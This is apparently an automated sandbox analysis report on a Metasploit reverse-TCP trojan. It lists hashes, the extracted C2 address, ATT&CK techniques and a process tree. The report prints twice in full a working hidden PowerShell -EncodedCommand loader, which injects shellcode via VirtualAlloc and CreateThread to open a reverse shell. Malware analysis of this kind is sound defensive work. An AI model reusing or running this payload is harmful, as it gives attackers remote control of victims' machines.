metasploit | 92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787

General

Target

92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe
Size

17KB
MD5

01f7ce6d9dfd5705227235823d4f8fac
SHA1

2a6a8f97ccb27b743f033f52cbe44d940dec7cd6
SHA256

92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787
SHA512

27811ac4a97006fc63f8e34adc2e7159df9a9fe93ca4a3afcfd78e2e587d2d41c00167b05ad98c002d0493301c95f0eb9f47a6aaf931c008e6d981f647e44c96
SSDEEP

384:t7n9EEoLO56ayzcMj+g/uaIjdOPCcmL6nvDciFs5INe4pAHLw4gj:paE8O56lcVlOPCcfvDciFs5INerLwj

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.42.130:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
448	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
448	powershell.exe
448	powershell.exe
4808	powershell.exe
4808	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 3436 wrote to memory of 888	3436	92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe	83
PID 3436 wrote to memory of 888	3436	92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe	83
PID 888 wrote to memory of 448	888	cmd.exe	84
PID 888 wrote to memory of 448	888	cmd.exe	84
PID 448 wrote to memory of 4808	448	powershell.exe	85
PID 448 wrote to memory of 4808	448	powershell.exe	85
PID 448 wrote to memory of 4808	448	powershell.exe	85
PID 4808 wrote to memory of 2292	4808	powershell.exe	86
PID 4808 wrote to memory of 2292	4808	powershell.exe	86
PID 4808 wrote to memory of 2292	4808	powershell.exe	86
PID 2292 wrote to memory of 5112	2292	csc.exe	87
PID 2292 wrote to memory of 5112	2292	csc.exe	87
PID 2292 wrote to memory of 5112	2292	csc.exe	87

C:\Users\Admin\AppData\Local\Temp\92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe
"C:\Users\Admin\AppData\Local\Temp\92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABDAGkAagBGAHkAcAAgAD0AIAAnACQAWABaAEkAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAFoASQBxACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAYgBiACwAMAB4ADUAZQAsADAAeAA1AGEALAAwAHgAYQA1ACwAMAB4ADEAOAAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMAA2ACwAMAB4ADQAOQAsADAAeAA0ADcALAAwAHgAZQBkACwAMAB4ADQAYQAsADAAeAA4ADUALAAwAHgAMAA4ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgANQA2ACwAMAB4ADcANwAsADAAeAA4ADYALAAwAHgANQA3ACwAMAB4ADYANwAsADAAeABhADUALAAwAHgAZgBjACwAMAB4ADEAYwAsADAAeABkAGEALAAwAHgANwA5ACwAMAB4ADcANgAsADAAeAA3ADAALAAwAHgAZAA3ACwAMAB4AGYAMgAsADAAeABkAGEALAAwAHgANgAwACwAMAB4AGQANgAsADAAeABmAGIALAAwAHgANQAwACwAMAB4AGYAYQAsADAAeAAzADAALAAwAHgAMABiACwAMAB4AGQAMAAsADAAeABiADAALAAwAHgANgA2ACwAMAB4ADIAMgAsADAAeABkAGUALAAwAHgAZQA4ACwAMAB4ADUAYgAsADAAeAAyADUALAAwAHgAYQAyACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAOAA1ACwAMAB4ADkAYgAsADAAeAAzAGQALAAwAHgAYwAyACwAMAB4AGMANAAsADAAeABkAGMALAAwAHgAOAA4ACwAMAB4AGEAOAAsADAAeAAyADkALAAwAHgAYgAwACwAMAB4ADUAZAAsADAAeABkADgALAAwAHgAZQA0ACwAMAB4ADIANQAsADAAeABlAGEALAAwAHgAOQBjACwAMAB4ADMANAAsADAAeAA0ADcALAAwAHgAMwBjACwAMAB4AGEAYgAsADAAeAAwADUALAAwAHgAMwBmACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAZgAxACwAMAB4AGYAMwAsADAAeAA0ADAALAAwAHgAYgBkACwAMAB4AGEAYQAsADAAeAA4ADAALAAwAHgAMQBhACwAMAB4ADEAZAAsADAAeAA0AGEALAAwAHgANAA0ACwAMAB4ADEAMQAsADAAeAAxADUALAAwAHgANQA0ACwAMAB4AGUAZgAsADAAeABlAGMALAAwAHgAZAAyACwAMAB4ADUAOAAsADAAeABhADYALAAwAHgANgA1ACwAMAB4ADIAZQAsADAAeAAyAGEALAAwAHgAMAA5ACwAMAB4ADgANgAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4ADUAYgAsADAAeABiADgALAAwAHgAOQAwACwAMAB4AGMAZAAsADAAeAA5ADEALAAwAHgAOQA0ACwAMAB4ADEAMgAsADAAeAAxADUALAAwAHgAOQAxACwAMAB4ADAANAAsADAAeAA2ADEALAAwAHgANgBkACwAMAB4AGUAMQAsADAAeABiADkALAAwAHgANwAyACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgANgA1ACwAMAB4AGYANgAsADAAeAAyADkALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAOABkACwAMAB4AGIAZAAsADAAeAAyADMALAAwAHgAMwA2ACwAMAB4ADQANQAsADAAeABiADEALAAwAHgAOAA4ACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADAAZgAsADAAeAA5ADAALAAwAHgAMwA5ACwAMAB4AGUAMgAsADAAeAA4ADQALAAwAHgAMQA3ACwAMAB4AGUAZQAsADAAeAA2ADIALAAwAHgAZABlACwAMAB4ADMAMwAsADAAeAAyAGEALAAwAHgAMgBlACwAMAB4ADgANQAsADAAeAA1AGEALAAwAHgANgBiACwAMAB4ADgAYQAsADAAeAA2ADgALAAwAHgANgAyACwAMAB4ADYAYgAsADAAeAA3ADIALAAwAHgAZAA1ACwAMAB4AGMANgAsADAAeABlADcALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA3ADYALAAwAHgAMAA4ACwAMAB4ADYAYQAsADAAeAAyAGQALAAwAHgAMgBhACwAMAB4ADkAZgAsADAAeABhADYALAAwAHgAZQAzACwAMAB4AGQANQAsADAAeAA1AGYALAAwAHgAYQAxACwAMAB4ADcANAAsADAAeABhADUALAAwAHgANgBkACwAMAB4ADYAZQAsADAAeAAyAGUALAAwAHgAMgAxACwAMAB4AGQAZQAsADAAeABlADcALAAwAHgAZQA4ACwAMAB4AGIANgAsADAAeAA1ADcALAAwAHgAZQBmACwAMAB4ADAAYgAsADAAeAA2ADgALAAwAHgAZABmACwAMAB4ADYAMAAsADAAeABmADIALAAwAHgAOAA5ACwAMAB4ADIAMAAsADAAeABhADgALAAwAHgAMwAwACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAYwAyACwAMAB4ADkAMQAsADAAeAA1AGUALAAwAHgAMQBiACwAMAB4ADEAMgAsADAAeAAxAGUALAAwAHgAOABiACwAMAB4AGIANgAsADAAeAAxADgALAAwAHgAOAA4ACwAMAB4AGYANAAsADAAeABlAGYALAAwAHgAMwA3ACwAMAB4AGMAYQAsADAAeAA5AGQALAAwAHgAZQBkACwAMAB4ADQANwAsADAAeABkAGIALAAwAHgAMAAxACwAMAB4ADcAYgAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOQAsADAAeAAyAGIALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA1AGEALAAwAHgAOABjACwAMAB4ADIAZQAsADAAeAAwADMALAAwAHgAYgAwACwAMAB4ADAAMwAsADAAeAAxADAALAAwAHgAMwAzACwAMAB4AGIAYgAsADAAeABjADkALAAwAHgAMwA5ACwAMAB4AGQAOQAsADAAeAA1ADQALAAwAHgAYQA0ACwAMAB4ADEAMgAsADAAeAA3ADUALAAwAHgAYwBjACwAMAB4AGUAZAAsADAAeABlADkALAAwAHgAZQA0ACwAMAB4ADEAMQAsADAAeAAzADgALAAwAHgAOQA0ACwAMAB4ADIANgAsADAAeAA5ADkALAAwAHgAYwBmACwAMAB4ADYAOAAsADAAeABlADgALAAwAHgANgBhACwAMAB4AGEANQAsADAAeAA3AGEALAAwAHgAOQBjACwAMAB4ADkAYQAsADAAeABmADAALAAwAHgAMgAxACwAMAB4ADAAYQAsADAAeABhADQALAAwAHgAMgBlACwAMAB4ADQAZgAsADAAeABiADIALAAwAHgAMwAwACwAMAB4AGQANQAsADAAeABjADYALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeABkADcALAAwAHgAMwBmACwAMAB4AGMAMQAsADAAeAA3ADIALAAwAHgAMgA3ACwAMAB4ADYAYQAsADAAeAA1AGEALAAwAHgAYgBhACwAMAB4AGIAZAAsADAAeABkADUALAAwAHgAMwA0ACwAMAB4AGMAMwAsADAAeAA1ADEALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAA5ADUALAAwAHgAMwBiACwAMAB4AGQANgAsADAAeABhAGMALAAwAHgANAAxACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADgAZAAsADAAeABiADUALAAwAHgAYgA5ACwAMAB4ADQAMgAsADAAeAAxADgALAAwAHgAMwA2ACwAMAB4AGUAOAAsADAAeAAzADcALAAwAHgAOABiACwAMAB4ADUAZQAsADAAeAAxADYALAAwAHgANgBlACwAMAB4AGYAYgAsADAAeABjADAALAAwAHgAZQA5ACwAMAB4ADQANQAsADAAeABmAGQALAAwAHgAMwBkACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgAOABiACwAMAB4ADIAZgAsADAAeABmAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAaQBqAEYAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAaQBqAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEMAaQBqAEYALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAGkAagBGAHkAcAApACkAOwAkAFUASQBOAFMAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABRAFoANgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABRAFoANgAgACQAVQBJAE4AUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABVAEkATgBTACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JABDAGkAagBGAHkAcAAgAD0AIAAnACQAWABaAEkAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAFoASQBxACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAYgBiACwAMAB4ADUAZQAsADAAeAA1AGEALAAwAHgAYQA1ACwAMAB4ADEAOAAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMAA2ACwAMAB4ADQAOQAsADAAeAA0ADcALAAwAHgAZQBkACwAMAB4ADQAYQAsADAAeAA4ADUALAAwAHgAMAA4ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgANQA2ACwAMAB4ADcANwAsADAAeAA4ADYALAAwAHgANQA3ACwAMAB4ADYANwAsADAAeABhADUALAAwAHgAZgBjACwAMAB4ADEAYwAsADAAeABkAGEALAAwAHgANwA5ACwAMAB4ADcANgAsADAAeAA3ADAALAAwAHgAZAA3ACwAMAB4AGYAMgAsADAAeABkAGEALAAwAHgANgAwACwAMAB4AGQANgAsADAAeABmAGIALAAwAHgANQAwACwAMAB4AGYAYQAsADAAeAAzADAALAAwAHgAMABiACwAMAB4AGQAMAAsADAAeABiADAALAAwAHgANgA2ACwAMAB4ADIAMgAsADAAeABkAGUALAAwAHgAZQA4ACwAMAB4ADUAYgAsADAAeAAyADUALAAwAHgAYQAyACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAOAA1ACwAMAB4ADkAYgAsADAAeAAzAGQALAAwAHgAYwAyACwAMAB4AGMANAAsADAAeABkAGMALAAwAHgAOAA4ACwAMAB4AGEAOAAsADAAeAAyADkALAAwAHgAYgAwACwAMAB4ADUAZAAsADAAeABkADgALAAwAHgAZQA0ACwAMAB4ADIANQAsADAAeABlAGEALAAwAHgAOQBjACwAMAB4ADMANAAsADAAeAA0ADcALAAwAHgAMwBjACwAMAB4AGEAYgAsADAAeAAwADUALAAwAHgAMwBmACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAZgAxACwAMAB4AGYAMwAsADAAeAA0ADAALAAwAHgAYgBkACwAMAB4AGEAYQAsADAAeAA4ADAALAAwAHgAMQBhACwAMAB4ADEAZAAsADAAeAA0AGEALAAwAHgANAA0ACwAMAB4ADEAMQAsADAAeAAxADUALAAwAHgANQA0ACwAMAB4AGUAZgAsADAAeABlAGMALAAwAHgAZAAyACwAMAB4ADUAOAAsADAAeABhADYALAAwAHgANgA1ACwAMAB4ADIAZQAsADAAeAAyAGEALAAwAHgAMAA5ACwAMAB4ADgANgAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4ADUAYgAsADAAeABiADgALAAwAHgAOQAwACwAMAB4AGMAZAAsADAAeAA5ADEALAAwAHgAOQA0ACwAMAB4ADEAMgAsADAAeAAxADUALAAwAHgAOQAxACwAMAB4ADAANAAsADAAeAA2ADEALAAwAHgANgBkACwAMAB4AGUAMQAsADAAeABiADkALAAwAHgANwAyACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgANgA1ACwAMAB4AGYANgAsADAAeAAyADkALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAOABkACwAMAB4AGIAZAAsADAAeAAyADMALAAwAHgAMwA2ACwAMAB4ADQANQAsADAAeABiADEALAAwAHgAOAA4ACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADAAZgAsADAAeAA5ADAALAAwAHgAMwA5ACwAMAB4AGUAMgAsADAAeAA4ADQALAAwAHgAMQA3ACwAMAB4AGUAZQAsADAAeAA2ADIALAAwAHgAZABlACwAMAB4ADMAMwAsADAAeAAyAGEALAAwAHgAMgBlACwAMAB4ADgANQAsADAAeAA1AGEALAAwAHgANgBiACwAMAB4ADgAYQAsADAAeAA2ADgALAAwAHgANgAyACwAMAB4ADYAYgAsADAAeAA3ADIALAAwAHgAZAA1ACwAMAB4AGMANgAsADAAeABlADcALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA3ADYALAAwAHgAMAA4ACwAMAB4ADYAYQAsADAAeAAyAGQALAAwAHgAMgBhACwAMAB4ADkAZgAsADAAeABhADYALAAwAHgAZQAzACwAMAB4AGQANQAsADAAeAA1AGYALAAwAHgAYQAxACwAMAB4ADcANAAsADAAeABhADUALAAwAHgANgBkACwAMAB4ADYAZQAsADAAeAAyAGUALAAwAHgAMgAxACwAMAB4AGQAZQAsADAAeABlADcALAAwAHgAZQA4ACwAMAB4AGIANgAsADAAeAA1ADcALAAwAHgAZQBmACwAMAB4ADAAYgAsADAAeAA2ADgALAAwAHgAZABmACwAMAB4ADYAMAAsADAAeABmADIALAAwAHgAOAA5ACwAMAB4ADIAMAAsADAAeABhADgALAAwAHgAMwAwACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAYwAyACwAMAB4ADkAMQAsADAAeAA1AGUALAAwAHgAMQBiACwAMAB4ADEAMgAsADAAeAAxAGUALAAwAHgAOABiACwAMAB4AGIANgAsADAAeAAxADgALAAwAHgAOAA4ACwAMAB4AGYANAAsADAAeABlAGYALAAwAHgAMwA3ACwAMAB4AGMAYQAsADAAeAA5AGQALAAwAHgAZQBkACwAMAB4ADQANwAsADAAeABkAGIALAAwAHgAMAAxACwAMAB4ADcAYgAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOQAsADAAeAAyAGIALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA1AGEALAAwAHgAOABjACwAMAB4ADIAZQAsADAAeAAwADMALAAwAHgAYgAwACwAMAB4ADAAMwAsADAAeAAxADAALAAwAHgAMwAzACwAMAB4AGIAYgAsADAAeABjADkALAAwAHgAMwA5ACwAMAB4AGQAOQAsADAAeAA1ADQALAAwAHgAYQA0ACwAMAB4ADEAMgAsADAAeAA3ADUALAAwAHgAYwBjACwAMAB4AGUAZAAsADAAeABlADkALAAwAHgAZQA0ACwAMAB4ADEAMQAsADAAeAAzADgALAAwAHgAOQA0ACwAMAB4ADIANgAsADAAeAA5ADkALAAwAHgAYwBmACwAMAB4ADYAOAAsADAAeABlADgALAAwAHgANgBhACwAMAB4AGEANQAsADAAeAA3AGEALAAwAHgAOQBjACwAMAB4ADkAYQAsADAAeABmADAALAAwAHgAMgAxACwAMAB4ADAAYQAsADAAeABhADQALAAwAHgAMgBlACwAMAB4ADQAZgAsADAAeABiADIALAAwAHgAMwAwACwAMAB4AGQANQAsADAAeABjADYALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeABkADcALAAwAHgAMwBmACwAMAB4AGMAMQAsADAAeAA3ADIALAAwAHgAMgA3ACwAMAB4ADYAYQAsADAAeAA1AGEALAAwAHgAYgBhACwAMAB4AGIAZAAsADAAeABkADUALAAwAHgAMwA0ACwAMAB4AGMAMwAsADAAeAA1ADEALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAA5ADUALAAwAHgAMwBiACwAMAB4AGQANgAsADAAeABhAGMALAAwAHgANAAxACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADgAZAAsADAAeABiADUALAAwAHgAYgA5ACwAMAB4ADQAMgAsADAAeAAxADgALAAwAHgAMwA2ACwAMAB4AGUAOAAsADAAeAAzADcALAAwAHgAOABiACwAMAB4ADUAZQAsADAAeAAxADYALAAwAHgANgBlACwAMAB4AGYAYgAsADAAeABjADAALAAwAHgAZQA5ACwAMAB4ADQANQAsADAAeABmAGQALAAwAHgAMwBkACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgAOABiACwAMAB4ADIAZgAsADAAeABmAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAaQBqAEYAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAaQBqAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEMAaQBqAEYALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAGkAagBGAHkAcAApACkAOwAkAFUASQBOAFMAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABRAFoANgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABRAFoANgAgACQAVQBJAE4AUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABVAEkATgBTACAAJABlACIAOwB9AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
